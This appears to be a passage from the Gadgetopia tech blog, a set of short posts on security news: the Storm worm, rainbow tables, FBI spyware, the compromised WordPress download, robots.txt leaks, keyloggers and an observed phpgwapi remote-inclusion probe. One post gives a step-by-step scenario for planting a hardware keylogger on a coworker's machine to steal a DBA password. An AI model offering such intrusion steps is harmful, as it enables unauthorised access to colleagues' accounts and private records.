Gadgetopia

BlueProximity - GNOME Bluetooth device distance detection and automatic locking tool :-): What a great idea. Of course, I keep my cell phone on my desk or in my coat pocket half the time, so I’m still screwed.

This software helps you add a little more security to your desktop. It does so by detecting one of your bluetooth devices, most likely your mobile phone, and keeping track of its distance. If you move away from your computer and the distance is above a certain level (no measurement in meters is possible) for a given time, it automatically locks your desktop (or starts any other shell command you want).

Once, sure. Twice, Maybe. Three? Four!?!: A good roll-up of news and theories about all the Internet cable cutting going on lately, full of good links.

On a related note, Iran has recently announced plans to move to trade oil with the Euro rather than the US dollar, which will cause further devaluing of the greenback. Saddam Hussein was in the process of doing the same before the US invasion, a decision reversed by the occupying force.

Some are interpreting this as signs of an “info war” […]

There’s also a Wikipedia page.

Scam Czars: What’s Russian for ‘Hacker’?: An interesting article that attempts to explain why so many hackers come from Russia.

Russia has long had a strong system of math and science education, and until the relatively recent upturn in the economy, the multitudes of whiz kids who graduated from its schools often had poor job prospects.

At the same time, they were entering a society that for decades had built up a deep skepticism about the virtues of following the rules. Under Communism, the thicket of strictures that governed almost every aspect of life was considered so inane that only fools were thought to abide by them.

[…] One result was that corruption was rampant in Soviet times, and has endured, if not gotten worse.

Official: International hackers going after U.S. networks: 140 of 194 is…72% of the world, trying to hack our government. Nice.

About 140 foreign intelligence organizations are trying to hack into the computer networks of the U.S. government and U.S. companies, a top counterintelligence official said.

The nation’s electronic systems are too easy to hack, and the number of world-class hackers is “multiplying at bewildering speed,” he said at a symposium on cyber security Friday.

That, he said, has transformed the nature of counterintelligence: “If you can exfiltrate massive amounts of information electronically from the comfort of your own office on another continent, why incur the expense and risk of running a traditional espionage operation?”

Matrix Sequel Has Hacker Cred: An old article, but one I’d missed up until now: apparently “The Matrix Reloaded” contains the rarest of cinematic rarities — an accurate hack attempt.

An Nmap port scan is a common prelude to an intrusion attempt — a way of casing the joint, to find out if any vulnerable service are running.

That’s exactly how the fictional Trinity uses it. In a sequence that flashes on screen for a few scant seconds, the green phosphor text of Trinity’s computer clearly shows Nmap being run against the IP address 10.2.2.2, and finding an open port number 22, correctly identified as the SSH service used to log into computers remotely.

“I was definitely pretty excited when I saw it,” says “Fyodor,” the 25-year-old author of Nmap. “I think compared to previous movies that had any kind of hacking content, you could generally assume it’s going to be some kind of stupid 3D graphics show.”

Here’s an image of the scene.

Gathering ‘Storm’ Superworm Poses Grave Threat to PC Nets: Lemme tell you: if Bruce Schneier is even a little afraid, then I’m curled up in a fetal position somewhere rocking back and forth.

Worms like Storm are written by hackers looking for profit, and they’re different. These worms spread more subtly, without making noise. Symptoms don’t appear immediately, and an infected computer can sit dormant for a long time. If it were a disease, it would be more like syphilis, whose symptoms may be mild or disappear altogether, but which will eventually come back years later and eat your brain.

This part is really scary.

We simply don’t know how to stop Storm, except to find the people controlling it and arrest them.

Unfortunately we have no idea who controls Storm, although there’s some speculation that they’re Russian. The programmers are obviously very skilled, and they’re continuing to work on their creation.

Oddly enough, Storm isn’t doing much, so far, except gathering strength.

Rainbow Hash Cracking: Think your password is secure?

The multi-platform password cracker Ophcrack is incredibly fast. How fast? It can crack the password “Fgpyyih804423” in 160 seconds. Most people would consider that password fairly secure.

This post is a nice introduction to the concept of “rainbow tables” and that they mean to security.

FBI’s Secret Spyware Tracks Down Teen Who Made Bomb Threats: The FBI is using spyware to great effect, apparently.

FBI agents trying to track the source of e-mailed bomb threats against a Washington high school last month sent the suspect a secret surveillance program designed to surreptitiously monitor him and report back to a government server, according to an FBI affidavit obtained by Wired News.

The court filing offers the first public glimpse into the bureau’s long-suspected spyware capability, in which the FBI adopts techniques more common to online criminals.

WordPress 2.1.1 dangerous, Upgrade to 2.1.2: This is pretty bad. Yikes.

This morning we received a note to our security mailing address about unusual and highly exploitable code in WordPress. The issue was investigated, and it appeared that the 2.1.1 download had been modified from its original code. We took the website down immediately to investigate what happened.

It was determined that a cracker had gained user-level access to one of the servers that powers wordpress.org, and had used that access to modify the download file.

Something fairly obvious hit me in the face yesterday: robots.txt files can be a cracker’s best friend.

We knew of someone who had a directory on their site filled with the install files and license keys of all their software so it would be easy to find. In a cursory nod to security, they put a “disallow” rule for this folder in their robots.txt file to ensure it wasn’t indexed. However, in doing this, they simply provided a handy record in a standardized location for anyone who was looking for something they were trying to hide.

How often does this happen, I wonder, and what does your robots.txt file reveal about your site? Yes, you can prevent search engines from indexing something (those that respect the file, anyway), but you’re also announcing to the world that there’s something there you don’t want anyone poking around in. (Remember when the White House tried this?). You may as well put out a “Start Hacking Here” sign.

If you have a secure area on your site, perhaps you’d do better with META tags?

<meta name="robots" content="noindex"/>

Same effect, but the “don’t index me” command is embedded in the page itself, which means you have to find it first.

Perhaps we should all go check our robots.txt files right now to see if there’s anything incriminating in them? Mine’s cool.

We’ve talked a bit about keyloggers before, which can be a brutally effective way to capture passwords (see this post, this post, or this post).

But there’s a completely simple way to defeat them, based on the fact that a keylogger doesn’t know where on the page the focus is when you’re typing — it has no context, it just has what is typed.

So, next time you login from a public internet terminal or somewhere else you want to make sure your keystrokes aren’t being logged, do this —

Put the focus on the password field, and type one character. Then click somewhere else on the page — open Notepad if you have to — and type a bunch of random characters. Then, click back in the password field, and type another character. Repeat until your password is complete.

Extremely simple, extremely effective. Without the context of where the focus was when you were typing, the resulting string of characters is useless.

From this report at Alta Vista Security Group. Via Metafilter.

I monitor the 404s on this site, and I found an interesting one today. It was an inbound request to:

/phpgwapi/setup/tables_update.inc.php?appdir=[deleted]

“phpgwapi” is an open source groupware toolkit. It must have a recorded exploit, because the deleted part was a URL that someone was trying to get phpgwapi to remotely include and execute.

I visited the URL and found an unparsed PHP page called “Defacing Tool Pro 3.0,” part of which is screencapped above (remember that it wasn’t parsed or executed, so there’s some random PHP code scattered around up there).

This baby has everything you could ever need to deface a Web site, including the ability to manipulate the file system, run interactive PHP, send arbitrary code through POST and GET, try common URLs for database administration tools, etc. Essentially, if you can get this to run on someone’s machine, it’s a control panel using which you can really screw with their Web site.

On the Web, Pedophiles Extend Their Reach: This is an interesting — albeit horrifying — article about the burgeoning pedophile communities on the Web. The combination of anonymity and remote congregation make it possible for shunned corners of society to operate “in the open.”

Today, pedophiles go online to seek tips for getting near children — at camps, through foster care, at community gatherings and at countless other events. They swap stories about day-to-day encounters with minors. And they make use of technology to help take their arguments to others, like sharing online a printable booklet to be distributed to children that extols the benefits of sex with adults.

And at the risk of just trying to freak people out, this part made me a little ill:

[…] elsewhere in cyberspace, the second group celebrated the news that one of their own had been offered a job leading a boys’ cabin at a sleep-away camp.

But participants in the conversation did not focus on the work. “Hope you see some naked boys in your cabin,” a man calling himself PPC responded. “And good luck while restraining yourself from doing anything.”

Lessons Learned from Biggest Bank Heist in History: In the comments on yesterday’s post about hardware keystroke loggers, someone posted a link to this story about a near-heist at the Japanese bank, Sumitomo Mitsui. Would-be robbers used this exact attack.

By installing software keystroke loggers on the PCs that belonged to the bank personnel responsible for wire transfers over the SWIFT (Society for Worldwide Interbank Financial Telecommunication) network, the thieves captured credentials that were then used to transfer 220 million pounds (call it half-a-billion dollars).

Apparently, Sumitomo Mitsui now superglues their keyboards into the machines.

Say you work in a company and are up for a promotion. You want to negotiate your salary effectively, but to do this, you need to know what others in that position are making. How do you get into the Human Resource records?

Bob, who has a cube across the hall, is the DBA. He could get in there, but how do you get his password? Your network is monitored and audited pretty closely. You can’t do anything to steal his password “on the network” which might get logged and would be traceable to you.

Enter this little device:

This USB keyboard logger has a huge 2MB or 4MB memory capacity, organized into an advanced flash file system. Super fast data retrieve is achieved by switching into pendrive mode for download. Completely invisible for computer operation…

It comes in USB and PS/2 models and costs less than $100. (No link, lest I be accused of encouraging this. You can find these things easily enough if you want to.)

One night, you work late, then you unplug his keyboard, plug this device into his computer, then plug his keyboard into the device. His computer is way under his desk, so he’ll never see it. You retrieve the device the next evening and download all his keyboard input for the entire day from the internal Flash memory. It wouldn’t be hard to pick out his password, and now you’re him.

This is unlike a software keyboard logger because there’s no evidence left behind. No process that runs in the background, no need to install anything on his machine, etc. It’s like stabbing someone with an icicle — no evidence gets left behind.

All you security types out there — how do you defend against this? Do they sell encrypting keyboards, which encrypt data sent down the keyboard cable and decrypt it on the machine?

Microsoft to hackers: Take your best shot: I’m fascinated to see how this is going to work out.

After suffering embarrassing security exploits over the past several years, Microsoft Corp. is trying a new tactic: inviting some of the world’s best-known computer experts to try to poke holes in Vista, the next generation of its Windows operating system.

Microsoft made a test version of Vista available to about 3,000 security professionals Thursday as it detailed the steps it has taken to fortify the product against attacks that can compromise bank account numbers and other sensitive information.

Liquid Web Project Streamer - r0t0r00t3r: For the record, this hack works exactly as they display here. Anyone can effectively open a Windows shell (explorer.exe) as the SYSTEM account. I don’t know the specifics of what this allows you to do, but it sure looks scary.

This could probably come in handy if I ever lost the admin password for a machine. But can it really be this simple?

(Warning: Embedded video, profane soundtrack. Fred Durst hates you, man)

I just saw an ad on TV from Bank of America touting a new anti-phising measure.

From what I could gather, you can pick or upload a picture. When you’re using the BOA Web interface, that picture will be displayed somewhere on the page.

The idea behind this is that a phishing site wouldn’t know what picture you had picked, so they couldn’t display it. So if you pick a picture of your cat, then you just need to make sure Fluffy is staring back at you from every page. That way you know you’re still on the BOA site and haven’t been hijacked by phishers.

Good idea? I’m not really sure.

Benjamin Daines was browsing the Web when he clicked on a series of links that promised pictures of an unreleased update to his computer’s operating system.

Instead, a window opened on the screen and strange commands ran as if the machine was under the control of someone — or something — else.

“It just shows people that no matter what kind of computer you use you are still open to some level of attack,” said Daines, a 29-year-old British chemical engineer who once considered Macs invulnerable to such attacks.

Just like I have always thought. Everything is vulnerable. It just depends who is targeted the most.

Entire article here.

Setting up a SFTP Server on Windows: Joe has me so paranoid about security these days that I shun FTP. We run all our stuff on SFTP, and they’re all Linux servers, so this isn’t a problem.

However, we’re bringing a publicly-exposed Windows server online, and I’m a little nervous about it. So, I was happy to find this resource with good instructions for SSHWindows, a SSH server for Windows.

It’s simple to set up, and it works well. I got SFTP running on my Windows server in about five minutes, giving me a little more ability to sleep at night.